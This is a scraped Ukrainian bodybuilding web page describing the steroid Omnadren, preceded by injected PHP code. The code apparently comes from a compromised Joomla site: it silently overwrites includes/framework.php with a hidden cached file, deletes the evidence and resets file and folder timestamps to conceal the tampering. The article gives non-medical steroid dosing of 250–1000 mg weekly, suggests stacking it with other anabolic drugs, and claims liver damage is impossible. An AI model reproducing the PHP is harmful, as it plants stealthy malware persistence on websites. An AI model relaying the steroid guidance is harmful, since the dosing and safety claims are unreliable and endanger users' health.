$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Омнадрен | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Омнадрен

ОмнадренОмнадрен - дуже популярний стероїд, який високо цінується тими, хто ним користується, тому що в порівнянні з іншими препаратами тестостерону має кілька переваг. Омнадрен - це суміш чотирьох тестостеронів, які внаслідок певної структури володіють сінергістичним ефектом. На підставі особливої взаємодії хімічних речовин Омнадрену міліграм за міліграмом надає кращий вплив, ніж тестостероненантат, ціпіонат і пропіонат. Крім того дія цих хімічних речовин виявляється і в часовому відношенні одна за одною, так що Омнадрен починає діяти швидко і в той же час залишається ефективно діючим в організмі протягом декількох тижнів, завдяки вмісту в сустанон пропіонату. Омнадрен справляє свій вплив на організм вже через день і продовжує бути активним в ньому 3 - 4 тижні завдяки доданому до складу деканоату. Омнадрен має виражений андрогенний вплив, що сполучається в ньому з сильним анаболічним ефектом. Тому він добре підходить для нарощування сили і м'язової маси. Відбувається сильний приріст сили з одночасним збільшенням маси тіла. Атлети, які використовують Омнадрен, розповідають про солідний приріст мускулатури, тому що він накопичує значно менше води і не так сильно ароматизується, як тестостероненантат і тестостеронціпіонат. Багато спортсменів бодібілдерів, що мають проблеми з іншими препаратами тестостерону зі значним скупченням води і високим рівнем естрогенів, надають перевагу Омнадрену перед іншими тестостеронами тривалої дії.

Кидається в очі те, що Омнадрен добре впливає навіть на бувалих атлетів у відносно невеликих дозах. Цікаво, що Омнадрен дає такі ж гарні результати у спортсменів, які вже не раз застосовували Омнадрен. Омнадрен вколюють всього раз на тиждень, при цьому перерва між ін'єкціями може доходити до 10 днів. Дозування в бодібілдингу і триборстві простягається від 250 мг до 1000 мг на тиждень. Для більшості достатньо дози в 500 мг на тиждень, яка часто скорочується до всього лише 250 мг Омнадрену на тиждень і комбінується з яким-небудь оральним стероїдом. У лікуванні Омнадрен дуже добре придатний як базисний стероїд, який сприяє регенираціі, дає атлетові достатній поштовх для інтенсивних тренувань і, разом з вже зазначеними перевагами, виділяється доброю переносимістю. Для швидкого нарощування м'язової маси Омнадрен часто комбінується з Дека-дураболін, Метандіеноном або Анаполоном, в той час як атлети, що надають більше уваги якості, комбінують його з Параболоном, Вінстролом, оксандролоном або з Прімоболаном.

Хоча Омнадрен в розумних дозах не сильно ароматизується, багато хто все ж додатково приймає анти-естроген, щоб таким чином за допомогою Нольвадекса та/або Провірена звести нанівець обумовлені естрогенами побічні явища. Оскільки Омнадрен пригнічує власне вироблення тестостерону, в кінці лікування або приблизно через 6 тижнів з початку його прийому слід приймати гонадотропін і/або Кломід. Жінкам не слід приймати тестостерон тривалої дії, тому що інакше сильно підвищується рівень андрогенів в крові і внаслідок цього можуть виникнути явища вірилізації. Ми хотіли б ще раз підкреслити, що новачки в стероїдних курсах повинні триматися подалі від всіх тестостеронів, тому що вони в даний період роботи над собою зовсім не потрібні.

Побічні явища Омнадрену схожі з побічними явищами тестостерону енантат, за тим винятком лише, що вони виявляються менш часто і не так сильно виражені. У залежності від часу прийому і доз Омнадрену можуть виникнути андрогенно обумовлені побічні явища: такі, як акне, агресивність, сексуальна суперстимуляція, жирна шкіра, прискорене випадання волосся, знижене вироблення статевих гормонів. Скупчення води і гінекомастія тримаються при Омнадрені в межах норми або виявляються не так часто, як при енантат і Ціпіонате. Пошкодження печінки при Омнадрені неможливе, і все-таки при дуже високих дозах може відбутися підвищення показників печінки, які в міру припинення прийому препарату знову нормалізуються.
 
Статті СТЕРОЇДИ Омнадрен